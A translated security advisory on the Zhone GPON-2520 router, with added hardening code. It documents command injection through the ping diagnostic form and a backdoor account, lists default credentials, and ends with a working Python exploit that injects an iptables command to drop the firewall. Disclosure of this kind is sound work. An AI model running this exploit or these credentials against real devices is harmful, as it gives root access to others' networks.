Command Execution and Backdoor in Zhone GPON-2520


Posted on Dec 18 2014

Summary

This post describes a backdoor account found in the Zhone GPON-2520 and provides a PoC that disables the firewall filtering rules, allowing remote access to services such as ssh, telnet and ftp.

Description

The Zhone GPON-2520 with firmware R4.0.2.566b (distributed in Mexico by Axtel) contains two severe vulnerabilities.

The first is OS command injection through the administrative web interface: the host field of the diagnostic ping form is handed to a shell unsanitized, so a command appended after a ";" runs with root privileges. This vulnerability had already been discovered and documented by Luis Colunga of Websec and also affects Alcatel modems.

As a consequence of the first vulnerability it is possible to enable remote access to the SSH service, which by default is filtered by the firewall. There is one caveat, however: the regular account for the web admin panel does not work with the SSH service. This is where the second vulnerability comes in: a backdoor account whose password cannot be changed.

To facilitate the process, a PoC has been created that removes the firewall rule on the GPON which filters incoming traffic to ssh/telnet/ftp. This enables remote access to those services as a super user and has no adverse effect on the connectivity or availability of the device.
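
Added example, not code from the advisory or from the GPON firmware: a reconstruction of why the diagnostic ping form is injectable, the hardened form of the same handler, and the PoC's form body rebuilt in Python 3. The firmware's real handler is not public, so vulnerable_ping() is an assumed model of the behaviour the PoC depends on (the dest_host field concatenated into a shell command line); the form field names (XWebPageName, dest_host, wan_conlist, diag_action) are the ones the PoC posts.

```python
import ipaddress
import re
import shlex
from urllib.parse import urlencode

# ASSUMED model of the /GponForm/diag_ZForm "ping" handler. The firmware is not
# public, but the PoC only works if dest_host is pasted into a shell command
# line, so a ';' ends the ping command and whatever follows runs with the web
# server's (root) privileges. Returns the string such a handler gives to sh -c.
def vulnerable_ping(dest_host):
    return "ping -c 4 " + dest_host


# Strict target syntax for the hardened handler: an IP address or a DNS hostname.
_HOSTNAME_RE = re.compile(
    r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def safe_ping(dest_host):
    """Hardened counterpart: validate the target and build an argv list.

    Handing argv to subprocess.run(argv) (no shell) means metacharacters in
    the input cannot start a second command; the validation also rejects them
    outright so the attempt can be logged instead of silently pinged.
    """
    try:
        ipaddress.ip_address(dest_host)
    except ValueError:
        if not _HOSTNAME_RE.match(dest_host):
            raise ValueError("rejected ping target: %r" % (dest_host,))
    return ["ping", "-c", "4", dest_host]


def shell_commands(cmdline):
    """Split a command line on shell separators the way sh would, to show
    what the vulnerable handler actually executes (one list per command)."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "&&", "||", "|", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def build_diag_payload(command):
    """Form body the PoC posts to /GponForm/diag_ZForm: the injected command
    rides in dest_host behind a ';' (field names taken from the PoC)."""
    fields = {
        "XWebPageName": "diag",
        "dest_host": ";" + command,
        "wan_conlist": "default",
        "diag_action": "ping",
    }
    return urlencode(fields)


if __name__ == "__main__":
    inject = ";iptables -D INPUT -p all -j ACL"      # the PoC's dest_host value
    print("vulnerable handler runs:", shell_commands(vulnerable_ping(inject)))
    print("PoC form body:", build_diag_payload(inject[1:]))
    for target in ("192.168.15.1", inject):
        try:
            print("hardened handler argv:", safe_ping(target))
        except ValueError as exc:
            print("hardened handler:", exc)
```

shell_commands() shows the two separate commands the vulnerable handler ends up executing for the PoC's input, while safe_ping() refuses the same input before anything runs; the argv form is the fix even when validation is in place, because it removes the shell from the path entirely.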

In the image below we can observe which ports are enabled by default on the GPON by running a port scan through https://w3dt.net.

The following ports are visible from the local network:

The only requirements for running the PoC are the internal IP address of the GPON and the username and password for the web interface, which are root/admin by default.

Once we have confirmed access to the GPON, we can run the PoC. After running it, the firewall rules which block incoming connections to critical services have successfully been disabled.


The backdoor account can now be used to access the SSH service with super user privileges.

The configuration for this backdoor account is stored in the file /etc/rg_zhone.xml.

Interestingly enough, this same backdoor is also mentioned in advisories for Alcatel modems.

Once inside the device, it is easy to view the credentials for other services, such as the FTP service, whose username and password are "ont:ont".

Running a password cracker against the /etc/passwd file reveals that the password for root is "111111".

The interface for the super user has several different modes which become available after running the command "enable".

Essentially any part of the device can be accessed or controlled. For example, the router's LEDs can be disabled by running the following commands.

Finally, if something goes wrong and a rollback is required, all that needs to be done is to reset the GPON. Additionally, an extra layer of protection can be added by using iptables on the device to filter all traffic from the Internet to the GPON.


Block traffic from the Internet:

iptables -A INPUT -i wan0 -p tcp --dport 22 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 23 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 53 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 80 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 7001 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 7002 -j DROP
iptables -A INPUT -i wan0 -p tcp --dport 49152 -j DROP

Block traffic from the internal network:

iptables -A INPUT -i wan8 -p tcp --dport 22 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 23 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 53 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 80 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 7001 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 7002 -j DROP
iptables -A INPUT -i wan8 -p tcp --dport 49152 -j DROP
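
Added example, not from the advisory: a small Python 3 script that applies the lockdown rules above idempotently. The interface names wan0 (Internet side) and wan8 (LAN side) and the port list are taken from the advisory's lists, with the repeated port 22 entry dropped; the `iptables -C` check for an already-present rule is standard iptables behaviour, not something the advisory uses. The `run` parameter is injectable so the logic can be exercised without root or an iptables binary.

```python
import subprocess

# Port list from the advisory, deduplicated (its listing repeats 22 on both interfaces)
GPON_PORTS = (22, 23, 53, 80, 7001, 7002, 49152)
# Internet-facing and LAN-facing interfaces, as named in the advisory
INTERFACES = ("wan0", "wan8")


def rule_args(iface, port):
    """Rule specification shared by -C (check) and -A (append)."""
    return ["INPUT", "-i", iface, "-p", "tcp", "--dport", str(port), "-j", "DROP"]


def build_rules(interfaces=INTERFACES, ports=GPON_PORTS):
    """One rule per (interface, port) pair, in a stable order, duplicates removed."""
    seen, rules = set(), []
    for iface in interfaces:
        for port in ports:
            key = (iface, int(port))
            if key not in seen:
                seen.add(key)
                rules.append(rule_args(iface, port))
    return rules


def _run_iptables(args):
    """Default runner: True when iptables exits 0 (must run as root on the device)."""
    proc = subprocess.run(["iptables"] + args,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    return proc.returncode == 0


def apply_rules(rules, run=_run_iptables):
    """Append each rule only if 'iptables -C' reports it absent.

    Returns the number of rules actually added, so a second run is harmless
    and reports 0 instead of stacking duplicate DROP rules in the INPUT chain.
    """
    added = 0
    for rule in rules:
        if not run(["-C"] + rule):
            if not run(["-A"] + rule):
                raise RuntimeError("iptables -A failed for: " + " ".join(rule))
            added += 1
    return added


if __name__ == "__main__":
    rules = build_rules()
    print("added %d of %d rules" % (apply_rules(rules), len(rules)))
```

Run it as root on the GPON after the PoC has given you a shell. As the advisory notes, these filter-table rules are not persistent and disappear when the device is reset; also note that the rules match `-p tcp` only, so UDP services on the same port numbers (DNS on 53/udp, for instance) are not affected by them.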


The following image shows the results of a port scan from the Internet after the iptables rules have been added.

This post will not explain how to make these iptables changes permanent, as there is always a risk of damaging the device, so any testing is done at your own risk and responsibility. However, we encourage you to share your comments, suggestions and ideas with us.

[email protected]

* This advisory was originally written by Luis Ramirez and translated by Roberto Salgado. The original advisory in Spanish can be found here.

POC

from httplib2 import Http
from urllib import urlencode
import sys

# Python 2 script: logs in to the GPON web interface, then abuses the ping
# diagnostic form (/GponForm/diag_ZForm) to inject an iptables command that
# deletes the ACL rule filtering inbound ssh/telnet/ftp.

if __name__ == "__main__":

    if len(sys.argv) != 4:
        print '*********************************************************************************'
        print ' GPON Zhone R4.0.2.566b RCE & Backdoor'
        print ' Tested on'
        print '          GPON Zhone 2520'
        print '          Hardware: 0040-48-02'
        print '          Software: R4.0.2.566b'
        print '                                 '
        print ' Usage : python', sys.argv[0] + ' <host> <web_user> <web_pass>'
        print ' Ex :    python', sys.argv[0] + ' 192.168.15.1 root admin'
        print ' Author : Kaczinski [email protected] '
        print ' URL : http://www.websec.mx/advisories'
        print '*********************************************************************************'
        sys.exit()

    HOST = sys.argv[1]
    USER = sys.argv[2]
    PASS = sys.argv[3]

    print '*********************************************************************************'
    print '[+] Logging in to the router: ' + HOST
    print '[+] User: ' + USER
    print '[+] Pass: ' + PASS

    h = Http()
    h.follow_redirects = True

    # Log in to the web admin panel (root/admin by default)
    data = dict(XWebPageName="index", username=USER, password=PASS)
    resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))

    # The marker string that identifies a successful login was lost from the
    # published listing; with an empty string find() always returns 0, so as
    # written this check never reports a failure.
    result = content.find("")
    if result < 0:
        print '[-] Authentication failed'
        print '*********************************************************************************'
        sys.exit()

    print '[+] Authentication succeeded'
    print '[+] Deleting the firewall rule that blocks SSH'
    # Command injection: dest_host is passed to a shell, so the ';' terminates
    # the ping command and the iptables command after it runs as root.
    data = dict(XWebPageName="diag", dest_host=";iptables -D INPUT -p all -j ACL",
                wan_conlist="default", diag_action="ping")
    resp, content = h.request("http://" + HOST + "/GponForm/diag_ZForm", "POST", urlencode(data))
    print '[+] The firewall rule should have been disabled, please ssh root@' + HOST + ' using admin as password to get your root shell :)'
    print '[+] Done'

    resp, content = h.request("http://" + HOST + "/logout.html", "GET")
    sys.exit()

